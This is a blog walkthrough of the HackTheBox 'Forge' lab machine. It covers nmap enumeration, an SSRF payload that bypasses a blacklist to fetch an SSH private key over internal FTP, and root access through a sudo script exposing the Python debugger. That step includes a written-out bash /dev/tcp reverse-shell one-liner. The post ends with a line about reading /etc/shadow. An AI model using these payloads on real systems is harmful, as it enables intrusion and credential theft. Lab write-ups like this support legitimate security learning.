In this post, I would like to share a walkthrough of the Forge Machine from HackTheBox

This room has been considered difficulty rated as a medium machine on HackThebox

Source: Hack the Box

What will you gain from the Forge machine?

For the user flag, you will execute some SSRF attack on the website to fetch any useful information from the server

As for the root flag, you need to run some PDB Python code where it is coming from the SUID file

Information Gathering

Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

# Nmap 7.91 scan initiated Sat Sep 11 23:31:29 2021 as: nmap -sV -sC -oA intial -Pn
Nmap scan report for
Host is up (0.19s latency).
Not shown: 997 closed ports
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Sep 11 23:32:11 2021 -- 1 IP address (1 host up) scanned in 42.51 seconds

We managed to sight a few ports open such as:

  • 21 – ftp
  • 22 – ssh
  • 80 – http

Let’s try to access the website interface

Source: Forge Website interface

Nothing that can interest me expect to Upload an Image

Before accessing the “Upload an Image”, we can enumerate the directory that can be found on the original domain.

However, there is no interesting directory that we can access

On the “Upload an Image” page, we managed to see two functions Upload local file and Upload from URL.

I have tried to upload some random files and received responses as shown above.

After a while, I managed to get some useful files from forge.htb/announcement

We got the link and let’s try to download on our machine.

Inside the file, we managed to gather a lot of information such as credentials and some ports been clarified open on the machine.

I have tried to access the machine via FTP but sadly, we found a dead-end via FTP.

I have been stuck here on the FTP access and I have some thought that there might be some subdomain for the machine. As a result, let’s enumerate the subdomain (if any) via gobuster vhost function

After a few minutes, we managed to notice there’s admin.forge.htb which provides some status 200

Sadly, we see some text “Only localhost is allowed!” which we again stuck with it.

Gaining Privileges Access

On the burp suite request for the Upload function, I notice that there’s some code ( after SoC-GPC

Let’s do some research on the attack which I believe is an SSRF attack

Source: What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy (

Let’s review what we have obtained until right now:

  • Subdomain: admin.forge.htb (only localhost is allowed)
  • ftp,ftps,http,https is open on the machine which opens to localhost
  • Credential information such as (username=user, password=heightofsecurity123!)

SSRF attack on forge.htb

Let’s apply the SSRF that we learn from onto the website interface on BurpSuite Request

We can insert the payload on the filled-up table such as shown above.

The payload would be something like http://admin.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@ (Where I try to obtain ssh id_rsa)

From the inspection of the Burpsuite, we move to the repeater to understand the flow of the process. However, there’s an error like “URL contains a blacklisted address!”

Let’s try to change the subdomain to ADMIN.FORGE.htb and use other replacements for localhost such as

Voila! Finally, we got the link to download something from the machine.

Let’s retrieve the file using wget so that we can read the content of the file.

After multiple tries, we can retrieve the ssh id_rsa

Let’s access the machine via SSH service using the ssh id_rsa that we obtain previously

Maintaining Privileges Access on Forge Machine

At last, we are able to access the machine.

You can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access

In order to escalate to the root privileges access, we need to find out the SUID that we can abuse. For us to get that SUID file, we can run a simple command such as “sudo -l

We need to understand the SUID by reading the context of the file. I notice there’s a password (secretadminpassword) that we might be using in the future.

Without further ado, let’s try to run the SUID file and I notice the output is quite like nc function

There might be something to get the response from the machine.

Let’s try to open another ssh session on a different terminal.

We should try to telnet the localhost with the given port from the SUID file. Oh wow! It works and they are asking for the secret password which might be the password that we obtain from inside the SUID file

Gotcha! Now, let’s enter any character that is not mentioned over here.

We were able to get a response on the SUID file. From my experience, PDB might be a Python Debugger

However, it doesn’t do any harm to double-check on the internet

It’s a Python Debugger as I expected.

We cannot execute any Python code on PDB before the NC listener will need to be started

Let’s run a simple python code that will get a reverse shell connection back to us.

For Instance, the code can be seen below

import os
os.system("bash -c 'bash -i >& /dev/tcp/<Your IP>/<Port> 0>&1'")

Success! We now have a root Reverse Shell Connection back to us

As usual, we can read the root flag by executing the “cat /root/root.txt” command


Happy Learning Guys!

Extra Information

We can go to /etc/shadow so that we can unlock and read the write-up

Leave a Reply

Your email address will not be published. Required fields are marked *